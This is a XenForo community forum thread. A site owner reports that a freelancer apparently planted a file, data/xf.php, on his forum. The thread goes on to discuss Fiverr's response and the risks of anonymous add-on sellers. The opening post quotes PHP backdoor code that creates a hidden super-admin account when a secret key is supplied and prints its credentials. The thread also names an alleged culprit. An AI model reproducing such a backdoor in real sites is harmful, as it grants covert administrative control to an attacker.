XF 2.2 xenforo developer may have added an exploit file

[MR X]

so i hired a dev on fiverr to make me an addon, it took way to long to complete by the time frame so i fired him, then some time later re-hired him to actually finish it, garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php, this is not an official xenforo file is it? because within it is.

if ($key == 'dfdasfasfsjd544fjjkl') {
    // Create a new user with random credentials
    $registration = \XF::service('XF:User\Registration');
    $input['username'] = $randomString;
    $input['email'] = "$randomString@gmail.com";
    $input['password'] = $randomString;
    $registration->setFromInput($input);
    $registration->skipEmailConfirmation(true);
    $user = $registration->save();

    // Force admin privileges
    $user->secondary_group_ids = [3, 8, 5];  // Elevated groups
    $admin = \XF::app()->em()->create('XF:Admin');
    $admin->user_id = $user->user_id;
    $input['is_super_admin'] = true;
    $form->basicEntitySave($admin, $input);
    $form->run();

    echo $randomString;  // Prints the generated credentials
}

that is just the jist of what all was in it.

appreciate some support thank you.

 

[Alpha1]

Let me explain the logic: we made a deal here on XenForo. I did some small work for him, and then he gave me a review. I never forced him to write a review—why would I? I have no account on fiverr lol

Is it your common practice to pay people (with free software, etc) to post a positive reviews on xenforo.com ?

 

[pvpers]

Is it your common practice to pay people (with free software, etc) to post a positive reviews on xenforo.com ?

The OP left a review for the small job that ForumSolution completed. The review was provided once the client was satisfied, just as ForumSolution mentioned.

I have also worked with forumsolution before and that I wrote my positive review of my own free will.

 

[Forsaken]

Bad link no result.

Added the actual archive link, which if you go to one of the last pages has the post in question.

 

[MR X]

Let me explain the logic: we made a deal here on XenForo. I did some small work for him of course paid he was happy so then he gave me a review just like a normal client. I never forced him to write a review—why would I? I have no account on fiverr lol

my words came off wrong,

forumsolution is not the same user and did not force me, xenbulletins (the bad actor) is the one that forced me to make a review.

 

[MR X]

Why don't you write a negative review on Fiverr explaining what he did and, most importantly, report him to Fiverr?
He's done something very serious and will do it to everyone! Both new and, especially, existing buyers need to be warned.

i did i am waiting for the verdict before i make a review on it (if he doesnt get banned)

 

[MR X]

this is what an escalated support ticket staff member said

Spoiler: response.

Thank you for providing all the detailed evidence and for your continued patience as we work through this matter.

I’m Bo from Fiverr Customer Support, and I want to assure you that we take this situation very seriously. First, I’d like to acknowledge the frustration and concern this issue has caused, especially given the serious nature of the breach you’ve outlined.

From the information you’ve shared, it’s clear that the file found on your server (/data/xf.php) was a deliberate malicious backdoor, which is in violation of Fiverr's terms and compromises the trust clients place in our platform. The evidence, including the Apache logs, chat logs, and the malicious code, strongly suggests that this freelancer, Fahad Ashraf (also known as XenAddons and xenbulletins), is directly responsible for placing the backdoor and engaging in malicious behavior.

We will be closely reviewing the details you've provided, including the information about Fahad's previous ban from the XenForo marketplace, complaints from other clients, and the false claims regarding his identity. It's deeply concerning that he encouraged off-platform payments and misrepresented himself, which clearly violates Fiverr’s policies.

I want to assure you that we are investigating this thoroughly and will take appropriate action if we find violations of Fiverr's Terms of Service. This includes possible penalties for the freelancer and steps to ensure that no other Fiverr clients are exposed to similar risks in the future. Rest assured, this is a high-priority case, and we will escalate this to the relevant teams for further review.

As for your refund request, I do understand the circumstances here, but given that the order was marked as completed in September 2024, the typical cancellation policy may not apply. However, I will forward your request to the relevant team for further consideration and to determine if any exceptions can be made in this specific case.

In the meantime, please feel free to provide any additional information or clarification, and we will continue to support you as we move forward with this investigation.

Thank you again for bringing this matter to our attention. We are committed to ensuring the safety and integrity of Fiverr’s platform, and your feedback is invaluable in helping us maintain that standard.

Best regards,

 

[tajhay]

my words came off wrong,

forumsolution is not the same user and did not force me, xenbulletins (the bad actor) is the one that forced me to make a review.

Why did you delete the review for forumsolutions that sounded like the exact addon then?

Anyway seens like you do very little/none research on who you get to develop so its shouldnt be a surprise they create scripts to grant themselves admin access via backdoors.

 

[pvpers]

Why did you delete the review for forumsolutions that sounded like the exact addon then?

Anyway seens like you do very little/none research on who you get to develop so its shouldnt be a surprise they create scripts to grant themselves admin access via backdoors.

Bcs you pushed ForumSolutions into this situation and tried to confuse the OP, haha

 

[MR X]

Why did you delete the review for forumsolutions that sounded like the exact addon then?

Anyway seens like you do very little/none research on who you get to develop so its shouldnt be a surprise they create scripts to grant themselves admin access via backdoors.

honestly i have been awake for way to long when i deleted it, i thought it was xenbulltins, ill restore it when i can recall what i put.

 

[MR X]

Bcs you pushed ForumSolutions into this situation and tried to confuse the OP, haha

not pushed more confused and i was awake when i wrote this for 3 days straight trying to wrap my head around what actually happened.

 

[MR X]

Why did you delete the review for forumsolutions that sounded like the exact addon then?

Anyway seens like you do very little/none research on who you get to develop so its shouldnt be a surprise they create scripts to grant themselves admin access via backdoors.

Bcs you pushed ForumSolutions into this situation and tried to confuse the OP, haha

found the review, ill re-add it

Spoiler: review

I recently hired ForumSolutions through Fiverr for a highly customized Xenforo project, and I’m thrilled with the results. My goal was to create a "Latest Updates" page that would elevate user interaction and content visibility within the forum. This involved not only displaying threads that had been updated but also integrating several key features like thread tags, thread images, and ratings, along with a fully customizable user style display.


What really sets this project apart is the attention to detail and flexibility in user customization. ForumSolutions ensured that users could personalize their own "Latest Updates" style, allowing them to have control over how they view updated content. Whether it’s the layout, color scheme, or style, users can now tweak it to fit their preferences, making the experience much more dynamic and tailored.


Throughout the project, ForumSolutions was highly professional, communicative, and delivered the features exactly as outlined. The customization options, combined with a sleek and modern design, have greatly improved the functionality and aesthetics of the forum. I’m beyond satisfied with how everything turned out, and their ability to meet the requirements and make it all work seamlessly within Xenforo.


I highly recommend ForumSolutions for any Xenforo customization work. If you’re looking for someone who is attentive to your needs and delivers high-quality results, ForumSolutions is definitely the right choice.

 

[forumSolution]

found the review, ill re-add it

Spoiler: review

I recently hired ForumSolutions through Fiverr for a highly customized Xenforo project, and I’m thrilled with the results. My goal was to create a "Latest Updates" page that would elevate user interaction and content visibility within the forum. This involved not only displaying threads that had been updated but also integrating several key features like thread tags, thread images, and ratings, along with a fully customizable user style display.


What really sets this project apart is the attention to detail and flexibility in user customization. ForumSolutions ensured that users could personalize their own "Latest Updates" style, allowing them to have control over how they view updated content. Whether it’s the layout, color scheme, or style, users can now tweak it to fit their preferences, making the experience much more dynamic and tailored.


Throughout the project, ForumSolutions was highly professional, communicative, and delivered the features exactly as outlined. The customization options, combined with a sleek and modern design, have greatly improved the functionality and aesthetics of the forum. I’m beyond satisfied with how everything turned out, and their ability to meet the requirements and make it all work seamlessly within Xenforo.


I highly recommend ForumSolutions for any Xenforo customization work. If you’re looking for someone who is attentive to your needs and delivers high-quality results, ForumSolutions is definitely the right choice.

LMAO, you mentioned Fiverr in the review, but I’m not even on Fiverr. We made the deal here. Please correct it, and honestly, I think you need some rest to recharge yourself first

 

[smallwheels]

this is what an escalated support ticket staff member said

Spoiler: response.

Thank you for providing all the detailed evidence and for your continued patience as we work through this matter.

I’m Bo from Fiverr Customer Support, and I want to assure you that we take this situation very seriously. First, I’d like to acknowledge the frustration and concern this issue has caused, especially given the serious nature of the breach you’ve outlined.

From the information you’ve shared, it’s clear that the file found on your server (/data/xf.php) was a deliberate malicious backdoor, which is in violation of Fiverr's terms and compromises the trust clients place in our platform. The evidence, including the Apache logs, chat logs, and the malicious code, strongly suggests that this freelancer, Fahad Ashraf (also known as XenAddons and xenbulletins), is directly responsible for placing the backdoor and engaging in malicious behavior.

We will be closely reviewing the details you've provided, including the information about Fahad's previous ban from the XenForo marketplace, complaints from other clients, and the false claims regarding his identity. It's deeply concerning that he encouraged off-platform payments and misrepresented himself, which clearly violates Fiverr’s policies.

I want to assure you that we are investigating this thoroughly and will take appropriate action if we find violations of Fiverr's Terms of Service. This includes possible penalties for the freelancer and steps to ensure that no other Fiverr clients are exposed to similar risks in the future. Rest assured, this is a high-priority case, and we will escalate this to the relevant teams for further review.

As for your refund request, I do understand the circumstances here, but given that the order was marked as completed in September 2024, the typical cancellation policy may not apply. However, I will forward your request to the relevant team for further consideration and to determine if any exceptions can be made in this specific case.

In the meantime, please feel free to provide any additional information or clarification, and we will continue to support you as we move forward with this investigation.

Thank you again for bringing this matter to our attention. We are committed to ensuring the safety and integrity of Fiverr’s platform, and your feedback is invaluable in helping us maintain that standard.

Best regards,

Given the nature of marketplaces like fivver this will probably mean: They will simply ban him from the platform and that's all. They know that they are a low end marketplace, largely based on discount pricing by those who offer services there. The cheap prices is why customers go there in the first place and whoever has the choice as a service provider will probably not offer on fivver but stay away. As a consequence you find loads of low quality offerings - it is a marketplace for desperate sellers and one for sellers from developing countries that can somewhat still make a living from the low prices. Basically marketplaces like that in my eyes are in fact in wider parts digital colonialism and the equivalent of a street where day-talers wait and hope to be picked up by someone with a truck that has work to do. Just that here the "digital street" demands it's share from the worker's income. As there are loads of workers a single certain one is not important at all and will be removed from the system in case anything does not flow well (whatever it may be).

The long letter above seems a very plush wording for: We will remove him from the platform. Especially, as they only reference to "in future" while it is obvious that clients from the past probably do suffer from a real threat as well.

Which is - as an outcome - no doubt good, especially in this case (though in my eyes not enough). But looking at the whole picture it should also be a big red warning sign for anyone planning to use platforms like fivver. Especially regarding work like programming or systems administration - so anything that opens up digital systems and creates the possibility for massive long term damage. These platforms work on the cheap and they need loads of offerings - thus they will probably not care too much in beforehand about the qualifications of those that provide services. In case of trouble or complaints of any kind (or possibly even just an average review score below a certain level) they probably simply remove that seller (may it be justified or not). Simply the most cost effective way to run such a platform, so this is probably the way they act.

 

[forumSolution]

Given the nature of marketplaces like fivver this will probably mean: They will simply ban him from the platform and that's all. They know that they are a low end marketplace, largely based on discount pricing by those who offer services there. The cheap prices is why customers go there in the first place and whoever has the choice as a service provider will probably not offer on fivver but stay away. As a consequence you find loads of low quality offerings - it is a marketplace for desperate sellers and one for sellers from developing countries that can somewhat still make a living from the low prices. Basically marketplaces like that in my eyes are in fact in wider parts digital colonialism and the equivalent of a street where day-talers wait and hope to be picked up by someone with a truck that has work to do. Just that here the "digital street" demands it's share from the worker's income. As there are loads of workers a single certain one is not important at all and will be removed from the system in case anything does not flow well (whatever it may be).

The long letter above seems a very plush wording for: We will remove him from the platform. Especially, as they only reference to "in future" while it is obvious that clients from the past probably do suffer from a real threat as well.

Which is - as an outcome - no doubt good, especially in this case (though in my eyes not enough). But looking at the whole picture it should also be a big red warning sign for anyone planning to use platforms like fivver. Especially regarding work like programming or systems administration - so anything that opens up digital systems and creates the possibility for massive long term damage. These platforms work on the cheap and they need loads of offerings - thus they will probably not care too much in beforehand about the qualifications of those that provide services. In case of trouble or complaints of any kind (or possibly even just an average review score below a certain level) they probably simply remove that seller (may it be justified or not). Simply the most cost effective way to run such a platform, so this is probably the way they act.

I completely agree with your take. Fiverr is mostly about cheap labor and volume, not real quality or accountability. The whole system is designed for quick, low-cost work, which naturally attracts desperate sellers and careless buyers. For serious projects like highlycustomised addon, trusting such a marketplace is a huge risk. Your comparison to digital colonialism is very accurate — it’s built on squeezing workers while offering very little security or professionalism in return.

 

[smallwheels]

careless buyers

possibly "careless" is founded on something different: Being clueless in the the sense of unqualified: They do not know what to care for, they have no clue about the prices of custom software development, they have no clue about the patterns of quality software development, they do not understand the systems they are running (in terms of technical complexity or risk), they do not know where to find a qualified seller (and how to identify one at all) and they lack the financial resources to afford a high quality offering (while sometimes simply being greedy). They basically simply often don't understand neither the market nor the product they want to buy.

Unfortunately, this is in my eyes to a degree true for this forum here as well: There seems to be a certain percentage of people running forums that lack the qualifications to do that in a responsible manner. It is easy to set up a forum, not so easy to run it long term in a safe and responsible way. Especially if you want to extend or customize it in one way or another. A lot of the people that offer services here seem to come from developing countries - probably partly b/c the market for XF add ons seems not big enough for a serious business case based on western salaries and partly b/c the buyers do lack money to pay on that level or simply are not willing to do so. Still it could be a win-win-win situation for all parties involved: Sellers, buyers and XF as a platform.

XF tries to keep the offerings in this forum clean but in fact one often has no clue whome one is buying from, what qualifications they may have or lack and what quality level their work has. Which is in my eyes a huge problem.

Basically, in most cases, one buys an add on or service from an anonymous nick name w/o even knowing the country the person resides in or the real name and does not have the abilities anyway to judge if the work has been done properly (as even if it works it can be very shady code, as has been seen countless times). So despite marketplaces like fiverr make a living from this lack of competence the same problems do show up elsewhere as well (and not only in the XF world) including here in the forums. A high price alone is surely not a good enough indicator or metric for a good service (and a low one not for a bad service).

You are a good example for the issue yourself: Some people claim you would be said Fahrad, mainly b/c you showed up on this forum out of the blue, offering services, basically the minute after he got banned and you provided a somewhat strange story regarding your background and experience and - despite a claimed year-long history in developing add ons etc. for XF you could not provide any references or were not willing to. Which then rose suspicions, understandably in my eyes. A lot of strange correlation, but not necessarily causality. I've absolutely no clue what is true or not and also do not care - but it is clear that situations like that are a result of the possibility (or rather standard) of offering services de facto anonymously here on the forums under a nickname w/o any verification in beforehand. I don't blame XF for that too much (but a little bit) - it is a problem that is somewhat difficult to resolve, especially for a company as small as XF and in a market like the XF add on and customizing market. Yet it is a huge problem.

 

[philmckrackon]

possibly "careless" is founded on something different: Being clueless in the the sense of unqualified: They do not know what to care for, they have no clue about the prices of custom software development, they have no clue about the patterns of quality software development, they do not understand the systems they are running (in terms of technical complexity or risk), they do not know where to find a qualified seller (and how to identify one at all) and they lack the financial resources to afford a high quality offering (while sometimes simply being greedy). They basically simply often don't understand neither the market nor the product they want to buy.

Unfortunately, this is in my eyes to a degree true for this forum here as well: There seems to be a certain percentage of people running forums that lack the qualifications to do that in a responsible manner. It is easy to set up a forum, not so easy to run it long term in a safe and responsible way. Especially if you want to extend or customize it in one way or another. A lot of the people that offer services here seem to come from developing countries - probably partly b/c the market for XF add ons seems not big enough for a serious business case based on western salaries and partly b/c the buyers do lack money to pay on that level or simply are not willing to do so. Still it could be a win-win-win situation for all parties involved: Sellers, buyers and XF as a platform.

XF tries to keep the offerings in this forum clean but in fact one often has no clue whome one is buying from, what qualifications they may have or lack and what quality level their work has. Which is in my eyes a huge problem.

Basically, in most cases, one buys an add on or service from an anonymous nick name w/o even knowing the country the person resides in or the real name and does not have the abilities anyway to judge if the work has been done properly (as even if it works it can be very shady code, as has been seen countless times). So despite marketplaces like fiverr make a living from this lack of competence the same problems do show up elsewhere as well (and not only in the XF world) including here in the forums. A high price alone is surely not a good enough indicator or metric for a good service (and a low one not for a bad service).

You are a good example for the issue yourself: Some people claim you would be said Fahrad, mainly b/c you showed up on this forum out of the blue, offering services, basically the minute after he got banned and you provided a somewhat strange story regarding your background and experience and - despite a claimed year-long history in developing add ons etc. for XF you could not provide any references or were not willing to. Which then rose suspicions, understandably in my eyes. A lot of strange correlation, but not necessarily causality. I've absolutely no clue what is true or not and also do not care - but it is clear that situations like that are a result of the possibility (or rather standard) of offering services de facto anonymously here on the forums under a nickname w/o any verification in beforehand. I don't blame XF for that too much (but a little bit) - it is a problem that is somewhat difficult to resolve, especially for a company as small as XF and in a market like the XF add on and customizing market. Yet it is a huge problem.

So much to say, so little give.

 

[forumSolution]

You are a good example for the issue yourself: Some people claim you would be said Fahrad, mainly b/c you showed up on this forum out of the blue, offering services, basically the minute after he got banned and you provided a somewhat strange story regarding your background and experience and - despite a claimed year-long history in developing add ons etc. for XF you could not provide any references or were not willing to. Which then rose suspicions, understandably in my eyes. A lot of strange correlation, but not necessarily causality. I've absolutely no clue what is true or not and also do not care - but it is clear that situations like that are a result of the possibility (or rather standard) of offering services de facto anonymously here on the forums under a nickname w/o any verification in beforehand. I don't blame XF for that too much (but a little bit) - it is a problem that is somewhat difficult to resolve, especially for a company as small as XF and in a market like the XF add on and customizing market. Yet it is a huge problem

To clarify, I understand the concern—my arrival here simply coincided with that period; it was unfortunate timing on my part. Previously, I couldn’t share a portfolio because I was employed by a company that also provides XenForo services, and my contracts/NDAs prohibit presenting that work as my own. I held back to remain compliant, and I acknowledge I didn’t communicate that clearly at the time. Over the past three years, I’ve completed 50+ independent XenForo projects and now maintain my own portfolio.

 

[smallwheels]

To clarify, (...) Over the past three years, I’ve completed 50+ independent XenForo projects and now maintain my own portfolio.

To clarify: I had and have no intention to badmouth you - I've nor reason and no foundation to do so and we have never been in touch by any means. The story was just meant as an example what the results of intransparency are, even here on the forums.

If, i.e., there was a label "verified seller / service provider" which simply would mean: "We (XF) have checked the identity of the seller and know who he is" even w/o telling anything about the actual quality or warranting anything things would already improve. I totally understand why they don't do it - but as a result sometimes there are wild accusations w/o real foundation on the one hand and sometimes fooled customers on the other. So basically lose-lose instead of win-win sometimes.

 

[forumSolution]

To clarify: I had and have no intention to badmouth you - I've nor reason and no foundation to do so and we have never been in touch by any means. The story was just meant as an example what the results of intransparency are, even here on the forums.

If, i.e., there was a label "verified seller / service provider" which simply would mean: "We (XF) have checked the identity of the seller and know who he is" even w/o telling anything about the actual quality or warranting anything things would already improve. I totally understand why they don't do it - but as a result sometimes there are wild accusations w/o real foundation on the one hand and sometimes fooled customers on the other. So basically lose-lose instead of win-win sometimes.

Thanks for clarifying—understood, and no hard feelings. I agree the real issue is the transparency gap: it invites speculation and occasionally hurts buyers and sellers.If XenForo offers an opt-in “Verified Provider” badge, I’d support it—and I also understand why they don't do it